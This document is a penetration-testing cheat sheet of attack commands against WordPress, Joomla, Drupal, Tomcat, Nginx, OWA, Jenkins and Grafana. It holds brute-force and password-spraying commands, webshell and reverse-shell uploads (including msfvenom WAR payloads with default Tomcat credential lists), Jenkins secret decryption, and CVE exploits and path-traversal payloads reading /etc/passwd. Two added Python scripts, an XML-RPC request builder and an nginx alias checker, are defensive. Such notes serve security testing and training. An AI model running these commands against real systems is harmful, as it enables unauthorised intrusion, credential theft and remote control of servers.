# CMS / Servers / Others

## 00. Webroot

```bash
/var/www/html/            # Apache
/usr/local/nginx/html/    # Nginx
c:\inetpub\wwwroot\       # IIS
C:\xampp\htdocs\          # XAMPP
```

## 01. Wordpress

* Scan

```bash
## ------------------| Basic
wpscan -e vt,tt,u,ap --url <URL>
wpscan -e vt,tt,u,ap -o wpscan.log --url <URL>

## ------------------| Plugin detection
wpscan -e ap --plugins-detection aggressive --url <URL>

## ------------------| Default Locations
/wp-content/plugins/akismet/index.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/twentytwentyone/404.php
/wp-content/themes/twentytwentytwo/404.php
/wp-content/plugins/revslider/public/index.php
/wp-content/plugins/contact-form-7/wp-contact-form-7.php
```

* Bruteforce password/username

```bash
## ------------------| With WPScan
wpscan -U <UserName/List> -P <Password/List> --url <URL>

## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python2 wpforce.py -w <Password/List> -i <UserName/List> -u <URL>

## ------------------| With WpCrack
wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py          
python WpCrack.py -t <URL> --p <Password/List> -u <UserName>
```

* Username/Password

```sql
select user_login,user_pass from wp_users;
```

* Webshell

```bash
## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python yertle.py -u "<username>" -p "<password>" -t "<URL>" -i

## Or

## ------------------| Create Plugin
wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php
zip -r shell.zip shell.php

## ------------------| Upload to
http://<IP>/wp-admin/plugin-install.php

## ------------------| Execute shell
http://<IP>/wp-content/plugins/shell/shell.php?cmd=id
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python3 -c 'import urllib.parse; print(urllib.parse.urlencode({"cmd":"uname -a"}))')"

## ------------------| Reverse shell (default port:443)
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python3 -c 'import urllib.parse; print(urllib.parse.urlencode({"ip":"<IP>"}))')"
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python3 -c 'import urllib.parse; print(urllib.parse.urlencode({"ip":"<IP>","port":"4545"}))')"
```

### 01.1 XML-RPC

* Automated \[[python-wordpress-xmlrpc](https://python-wordpress-xmlrpc.readthedocs.io/en/latest/)]

```bash
## ------------------| Install
pip install python-wordpress-xmlrpc
```

```python
## ------------------| Example I - Get Profile
# Run in an interactive shell (e.g. bpython)
from wordpress_xmlrpc import Client
from wordpress_xmlrpc.methods.users import GetProfile

client = Client('http://h4rithd.com/xmlrpc.php', 'username', 'password')
client.call(GetProfile())
```

* General

```bash
## ------------------| Lists all available XML-RPC methods on the server
curl -X POST http://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" --data '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>'

## ------------------| Get information about Parameters and Return Type of a Method
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>system.methodSignature</methodName><params><param><value><string>method_name</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param></params></methodCall>'

## ------------------| Get Description of a Method
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>system.methodHelp</methodName><params><param><value><string>method_name</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param></params></methodCall>'

## ------------------| Send a Pingback Notification
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>SOURCE_URL</string></value></param><param><value><string>TARGET_URL</string></value></param></params></methodCall>'

## ------------------| Get Pingbacks 
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>pingback.extensions.getPingbacks</methodName><params><param><value><string>URL</string></value></param></params></methodCall>'
```

* Posts

```bash
## ------------------| Creates a new post
#### Core WordPress (wp.newPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.newPost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>post_type</name><value><string>post</string></value></member><member><name>post_title</name><value><string>Hello, World!</string></value></member><member><name>post_content</name><value><string>This is my first post via XML-RPC.</string></value></member><member><name>post_status</name><value><string>publish</string></value></member></struct></value></param></params></methodCall>'
#### MetaWeblog API (metaWeblog.newPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.newPost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>title</name><value><string>New Post Title</string></value></member><member><name>description</name><value><string>This is the content of the new post.</string></value></member><member><name>categories</name><value><array><data><value><string>General</string></value></data></array></value></member><member><name>post_status</name><value><string>publish</string></value></member></struct></value></param></params></methodCall>'
#### Blogger API (blogger.newPost) - args: appkey (ignored by WordPress), blog_id, username, password, content string, publish
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>blogger.newPost</methodName><params><param><value><string>APPKEY</string></value></param><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><string>This is the content of the new post.</string></value></param><param><value><boolean>1</boolean></value></param></params></methodCall>'

## ------------------| Edits an existing post
#### Core WordPress (wp.editPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.editPost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>123</int></value></param><param><value><struct><member><name>post_title</name><value><string>Updated Title</string></value></member><member><name>post_content</name><value><string>Updated content here.</string></value></member></struct></value></param></params></methodCall>'
#### MetaWeblog API (metaWeblog.editPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.editPost</methodName><params><param><value><string>POST_ID</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>title</name><value><string>Updated Title</string></value></member><member><name>description</name><value><string>Updated content of the post.</string></value></member></struct></value></param></params></methodCall>'
#### Blogger API (blogger.editPost) - args: appkey, post_id, username, password, content string, publish
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>blogger.editPost</methodName><params><param><value><string>APPKEY</string></value></param><param><value><string>POST_ID</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><string>Updated content of the post.</string></value></param><param><value><boolean>1</boolean></value></param></params></methodCall>'

## ------------------| Retrieves a specific post
#### Core WordPress (wp.getPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getPost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>123</int></value></param></params></methodCall>'
#### MetaWeblog API (metaWeblog.getPost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.getPost</methodName><params><param><value><string>POST_ID</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param></params></methodCall>'

## ------------------| List All Posts
#### Core WordPress (wp.getPosts)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getPosts</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>number</name><value><int>10</int></value></member></struct></value></param></params></methodCall>'

## ------------------| Retrieve Recent Posts
#### MetaWeblog API (metaWeblog.getRecentPosts)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.getRecentPosts</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>5</int></value></param></params></methodCall>'

## ------------------| Retrieve a List of Blogs for the User
#### Blogger API (blogger.getUsersBlogs) - args: appkey, username, password
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>blogger.getUsersBlogs</methodName><params><param><value><string>APPKEY</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param></params></methodCall>'

## ------------------| Deletes a post
#### Core WordPress (wp.deletePost)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.deletePost</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>123</int></value></param></params></methodCall>'
#### MetaWeblog API (metaWeblog.deletePost) - same handler and args as blogger.deletePost in WordPress
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.deletePost</methodName><params><param><value><string>APPKEY</string></value></param><param><value><string>POST_ID</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><boolean>1</boolean></value></param></params></methodCall>'
#### Blogger API (blogger.deletePost) - args: appkey, post_id, username, password, publish
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>blogger.deletePost</methodName><params><param><value><string>APPKEY</string></value></param><param><value><string>POST_ID</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><boolean>1</boolean></value></param></params></methodCall>'
```

* Media

```bash
## ------------------| Uploads a new media file
#### Core WordPress (wp.uploadFile)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.uploadFile</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>name</name><value><string>example.jpg</string></value></member><member><name>type</name><value><string>image/jpeg</string></value></member><member><name>bits</name><value><base64>/9j/4AAQSkZJRgABAQEAAAAAAAD/2wCEAAgGBgcG...</base64></value></member><member><name>overwrite</name><value><boolean>1</boolean></value></member></struct></value></param></params></methodCall>'
#### MetaWeblog API (metaWeblog.newMediaObject)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>metaWeblog.newMediaObject</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>name</name><value><string>example.jpg</string></value></member><member><name>type</name><value><string>image/jpeg</string></value></member><member><name>bits</name><value><base64>/9j/4AAQSkZJRgABAQEAAAAAAAD/2wCEAAgGBgcG...</base64></value></member></struct></value></param></params></methodCall>'

## ------------------| Retrieve a Specific Media Item
#### Core WordPress (wp.getMediaItem)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getMediaItem</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>456</int></value></param></params></methodCall>'

## ------------------| Get a List of Media Files 
#### Core WordPress (wp.getMediaLibrary)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getMediaLibrary</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>number</name><value><int>10</int></value></member></struct></value></param></params></methodCall>'
```

* Users

```bash
## ------------------| Retrieve a List of Users
#### Core WordPress (wp.getUsers)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getUsers</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param></params></methodCall>'
#### Blogger API (blogger.getUserInfo) - args: appkey (ignored by WordPress), username, password
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>blogger.getUserInfo</methodName><params><param><value><string>APPKEY</string></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param></params></methodCall>'

## ------------------| Retrieve a Specific User
#### Core WordPress (wp.getUser)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getUser</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>789</int></value></param></params></methodCall>'

## ------------------| Retrieve Profile Information
#### Core WordPress (wp.getProfile)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getProfile</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param></params></methodCall>'

## ------------------| Edit Profile Information
#### Core WordPress (wp.editProfile)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.editProfile</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>first_name</name><value><string>Harith</string></value></member></struct></value></param></params></methodCall>'
```

* Comments

```bash
## ------------------| Add a New Comment 
#### Core WordPress (wp.newComment)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.newComment</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>123</int></value></param><param><value><string>This is a new comment.</string></value></param></params></methodCall>'

## ------------------| Retrieve a List of Comments
#### Core WordPress (wp.getComments)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getComments</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><struct><member><name>post_id</name><value><int>123</int></value></member></struct></value></param></params></methodCall>'

## ------------------| Retrieve a Specific Comment
#### Core WordPress (wp.getComment)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.getComment</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>456</int></value></param></params></methodCall>'

## ------------------| Edit an Existing Comment
#### Core WordPress (wp.editComment)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.editComment</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>456</int></value></param><param><value><struct><member><name>content</name><value><string>Updated comment text.</string></value></member></struct></value></param></params></methodCall>'

## ------------------| Delete a Comment 
#### Core WordPress (wp.deleteComment)
curl -X POST https://h4rithd.com/xmlrpc.php -H "Content-Type: text/xml" -d '<?xml version="1.0"?><methodCall><methodName>wp.deleteComment</methodName><params><param><value><int>1</int></value></param><param><value><string>USERNAME</string></value></param><param><value><string>PASSWORD</string></value></param><param><value><int>456</int></value></param></params></methodCall>'
```
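The script below is an added example, not part of this cheat sheet or of the python-wordpress-xmlrpc library. It builds the same `<methodCall>` bodies that the curl one-liners above hand-type (so generated requests can be compared against captured traffic when writing WAF or IDS rules), parses a `system.listMethods` reply, and flags methods such as `pingback.ping` that a hardened site is expected to have disabled. The sample responses and the flagged-method set are constructed assumptions.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Methods a hardened WordPress site normally does not need to expose remotely.
# This set is an assumption of the example (based on the pingback calls above),
# not a list taken from the page; extend it to match your own baseline.
FLAGGED_METHODS = {"pingback.ping", "pingback.extensions.getPingbacks"}


def _value(v):
    """Serialise one Python value as an XML-RPC <value> element."""
    if isinstance(v, bool):  # bool before int: bool is a subclass of int
        return "<value><boolean>%d</boolean></value>" % int(v)
    if isinstance(v, int):
        return "<value><int>%d</int></value>" % v
    if isinstance(v, str):
        return "<value><string>%s</string></value>" % escape(v)
    if isinstance(v, (list, tuple)):
        return "<value><array><data>%s</data></array></value>" % "".join(_value(i) for i in v)
    if isinstance(v, dict):
        members = "".join(
            "<member><name>%s</name>%s</member>" % (escape(k), _value(val))
            for k, val in v.items()
        )
        return "<value><struct>%s</struct></value>" % members
    raise TypeError("unsupported XML-RPC value: %r" % (v,))


def build_method_call(method, params=()):
    """Build the <methodCall> body the curl one-liners above write by hand.

    The layout matches the page's requests byte for byte (no <params> element
    when there are no parameters), so output can be diffed against captures.
    """
    body = "".join("<param>%s</param>" % _value(p) for p in params)
    params_xml = "<params>%s</params>" % body if params else ""
    return '<?xml version="1.0"?><methodCall><methodName>%s</methodName>%s</methodCall>' % (
        escape(method), params_xml)


def parse_method_list(response_xml):
    """Extract method names from a system.listMethods <methodResponse>.

    Raises ValueError on an XML-RPC <fault>, which is what a site that has
    disabled XML-RPC (or blocked the method) typically answers with.
    """
    root = ET.fromstring(response_xml)
    if root.tag != "methodResponse":
        raise ValueError("not an XML-RPC response: <%s>" % root.tag)
    fault = root.find("fault")
    if fault is not None:
        code = fault.find("./value/struct/member[name='faultCode']/value/int")
        raise ValueError("XML-RPC fault %s" % (code.text if code is not None else "?"))
    methods = []
    for value in root.findall("./params/param/value/array/data/value"):
        string = value.find("string")  # an untyped <value> also means string
        text = string.text if string is not None else value.text
        methods.append((text or "").strip())
    return methods


def flagged_methods(methods):
    """Return the exposed methods that the hardening baseline says to disable."""
    return sorted(m for m in methods if m in FLAGGED_METHODS)


# Constructed sample responses (not captured from any real site).
SAMPLE_LIST_RESPONSE = (
    '<?xml version="1.0"?><methodResponse><params><param><value><array><data>'
    "<value><string>system.listMethods</string></value>"
    "<value><string>wp.getUsersBlogs</string></value>"
    "<value><string>pingback.ping</string></value>"
    "<value><string>pingback.extensions.getPingbacks</string></value>"
    "</data></array></value></param></params></methodResponse>"
)
SAMPLE_FAULT_RESPONSE = (
    '<?xml version="1.0"?><methodResponse><fault><value><struct>'
    "<member><name>faultCode</name><value><int>405</int></value></member>"
    "<member><name>faultString</name><value><string>XML-RPC services are disabled on this site.</string></value></member>"
    "</struct></value></fault></methodResponse>"
)

if __name__ == "__main__":
    # The wp.getPosts request from the cheat sheet, generated instead of hand-typed.
    print(build_method_call("wp.getPosts", [1, "USERNAME", "PASSWORD", {"number": 10}]))
    exposed = parse_method_list(SAMPLE_LIST_RESPONSE)
    print("exposed:", exposed)
    print("flagged:", flagged_methods(exposed))
```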

## 02. Joomla

```bash
## ------------------| Identify version
# Navigate to 
/administrator/manifest/files/joomla.xml
# Check this tag
<version>3.7.5</version>

## ------------------| Run scan
joomscan -u <URL>
```

* CVE-2023-23752 (Authentication bypass resulting in an information leak)

```bash
## ------------------| Affected Versions
Joomla! < 4.2.8

## ------------------| Manual
curl 'http://<IP>/api/index.php/v1/config/application?public=true'

## ------------------| Automated
git clone https://github.com/ThatNotEasy/CVE-2023-23752 && cd CVE-2023-23752
pip3 install -r requirements.txt
python3 joomla.py
```

## 03. Drupal

### 03.1 Enumerations

```bash
## ------------------| Username enumeration
### Check if we can register new user (search for "name is already taken")
/user/register

### Check access status 
/user/<number>
/user/1
### 403 --> user exists
### 404 --> user doesn't exist

## ------------------| Hidden pages
wfuzz -c -z range,1-500 --hc 404 http://<IP>/node/FUZZ
```

### 03.2 Upload shell

```bash
## ------------------| Check "plugin php" status
/modules/php
### if status is 403 --> "plugin php" exists/installed

## ------------------| Install "plugin php"
Modules --> Check for PHP "Filter" --> Save

## ------------------| Upload shell
Add content --> Basic Page/Article --> <paste_shell> --> select "PHP code in Text format" --> Preview
```

## 04. Tomcat

```bash
## ------------------| Endpoint permissions
/manager/html      # <--- roles="manager-gui" 
/manager/text/list # <--- roles="manager-script"  [If we have /manager, Then we can use curl to upload war file :)]  
/host-manager/html # <--- roles="admin-gui"

## ------------------| Path Normalization
/manager/notexsits/..;/html/
/manager/;name=notexsits/html/
/;name=notexsits/manager/        # <--- not work for upload war files
/notexsits/..;/manager/          # <--- not work for upload war files
## Remember to put '/' at the end ^

## ------------------| Common Creds
tomcat:s3cret
tomcat:s3cr3t
admin:s3cr3t
tomcat:tomcat
admin:admin
admin:tomcat
tomcat:Tomcatadm
tomcat:TomcatAdm
tomcat:Tomcatadn
admin:<NOTHING>

## ------------------| Upload paths
/manager/deploy?war=file&path=/shell    ## Tomcat6
/manager/text/deploy?path=/shell        ## Tomcat7 and above

## ------------------| Upload via curl
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war  
curl -u 'username:password' -T shell.war http://<IP>:8080/manager/text/deploy?path=/h4rithd      

## ------------------| Manually Upload  
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war  
## Then copy shell.war into the \tomcat\webapps\ directory
## Then restart the service with \bin\startup.[sh/bat]; Tomcat extracts the WAR on startup
## Now you can use http://<IP>/shell/
```

## 05. Nginx

* [Path traversal via misconfigured NGINX alias.](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)

```bash
## ------------------| If the config looks like this (prefix location without a trailing slash, used with alias)
location /admin {
    <--code-->
}

## ------------------| It allows path traversal (LFI); try this
admin../config.php
```
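A small model of the off-by-slash alias bug, added here as an illustration and not taken from the linked article or the cheat sheet: it reproduces how nginx substitutes a prefix `location` with its `alias` string, so it shows why the missing trailing slash lets `/admin../config.php` escape the directory and confirms that the corrected `location /admin/` form does not match such requests at all. The location, alias and request paths are constructed.

```python
import posixpath

# Two constructed configurations for the same admin directory.
# Vulnerable: the prefix has no trailing slash while the alias does:
#   location /admin  { alias /var/www/app/admin/; }
# Corrected: both end in "/", so the prefix can only ever match "/admin/...":
#   location /admin/ { alias /var/www/app/admin/; }
VULNERABLE = ("/admin", "/var/www/app/admin/")
CORRECTED = ("/admin/", "/var/www/app/admin/")


def resolve_alias(location, alias, uri):
    """Model nginx's alias handling for a prefix location.

    nginx replaces the matched prefix with the alias string verbatim, adds no
    separator, and the result is normalised by the filesystem.  Returns None
    when the prefix does not match (nginx would try other locations instead).
    """
    if not uri.startswith(location):
        return None
    return posixpath.normpath(alias + uri[len(location):])


def escapes_root(location, alias, uri):
    """True if the request maps to a file outside the alias directory."""
    resolved = resolve_alias(location, alias, uri)
    if resolved is None:
        return False
    root = posixpath.normpath(alias)
    return resolved != root and not resolved.startswith(root + "/")


def audit(config, uris):
    """Return {uri: resolved_path} for every request that escapes the alias root."""
    location, alias = config
    return {u: resolve_alias(location, alias, u)
            for u in uris if escapes_root(location, alias, u)}


if __name__ == "__main__":
    probes = ["/admin/index.php", "/admin../config.php", "/admin../../.env"]
    print("vulnerable:", audit(VULNERABLE, probes))  # the traversal requests leak
    print("corrected: ", audit(CORRECTED, probes))   # {}: nothing matches the prefix
```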

## 06. SharePoint / OWA

### 06.1 SharePoint

```bash
## ------------------| Important directories 
/_layouts/viewlsts.aspx
```

### 06.2 OWA

```bash
## ------------------| Setup
git clone https://github.com/byt3bl33d3r/SprayingToolkit      
cd SprayingToolkit/
pip3 install -r requirements.txt

## ------------------| Create Usernames List (the default format is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt

## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01
```

## 07. Jenkins

* Interesting endpoints

```bash
/manage
/script
/credentials
```

* Configuration files

```bash
## ------------------| Linux
/var/jenkins_home/config.xml
/var/jenkins_home/users/users.xml
/var/jenkins_home/credentials.xml
/var/jenkins_home/secrets/master.key 
/var/jenkins_home/users/admin_*/config.xml
/var/jenkins_home/secrets/hudson.util.Secret
/var/jenkins_home/secrets/initialAdminPassword
/var/lib/jenkins/config.xml
/var/lib/jenkins/users/users.xml
/var/lib/jenkins/credentials.xml
/var/lib/jenkins/secrets/master.key 
/var/lib/jenkins/users/admin_*/config.xml
/var/lib/jenkins/secrets/hudson.util.Secret
/var/lib/jenkins/secrets/initialAdminPassword

## ------------------| Windows
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\credentials.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\users.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\master.key 
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret
```

* Reset password \[Read full post from [here](https://blog.searce.com/jenkins-change-the-forgotten-password-525169ba1c34)]

```bash
## ------------------| Method I (Reset Password)
## Edit the following file
sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml
## The bcrypt hash is stored under the <passwordHash> tag [here the password is h4rithd]
<passwordHash>#jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S</passwordHash>
## Restart the service
sudo systemctl restart jenkins

## ------------------| Method II (Decrypt Password using the script console)
## If you have access to /script, run the following there
## Get the encrypted secret from \users\<username>\config.xml
hudson.util.Secret.decrypt '<HASH>'

## ------------------| Method III (Decrypt Password offline)
## Download the following files
/var/jenkins_home/credentials.xml
/var/jenkins_home/secrets/master.key
/var/jenkins_home/secrets/hudson.util.Secret
## Get ssh keys
git clone https://github.com/hoto/jenkins-credentials-decryptor.git && cd jenkins-credentials-decryptor && make build
./bin/jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c credentials.xml -o text
## Get Password
pip install pycryptodome

```

* [CVE-2024-23897](https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability) | Jenkins <= 2.441

```bash
## ------------------| Manual
wget http://<JENKINS_URL>/jnlpJars/jenkins-cli.jar
java -jar jenkins-cli.jar -s <JENKINS_URL> connect-node '@/etc/passwd'
java -jar jenkins-cli.jar -s <JENKINS_URL> reload-job '@/etc/passwd' 

## ------------------| Automated
wget https://www.exploit-db.com/raw/51993 -O expo.py
python3 expo.py -u http://$IP:8080 -p /etc/passwd
```

* Remote Code Execution

{% tabs %}
{% tab title="Low level user" %}

* Create New Job


* Schedule Method


* Trigger Remotely Method


```bash
## ------------------| Trigger the job
curl "http://[username]:[token]@[host]/job/[job name]/build?token=[token name]" 
## Ex: curl "http://h4rithd:11afe9af0327e90fed163da849a39837bc@object.htb:8080/job/TestRun/build?token=h4rithdToken"             
```

{% endtab %}
{% endtabs %}

## 08. Grafana

* [Best PoC: jas502n/Grafana-CVE-2021-43798](https://github.com/jas502n/Grafana-CVE-2021-43798)
* Config files

```bash
## ------------------| Locations
/etc/grafana/grafana.ini
$WORKING_DIR/conf/defaults.ini
/usr/local/etc/grafana/grafana.ini
```

* [Unauthorized reading of files in Grafana](https://github.com/Vulnmachines/grafana-unauth-file-read) \[CVE-2021-43798] - [videoPOC](https://www.youtube.com/watch?v=mMEzHP96Jhg)

```bash
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
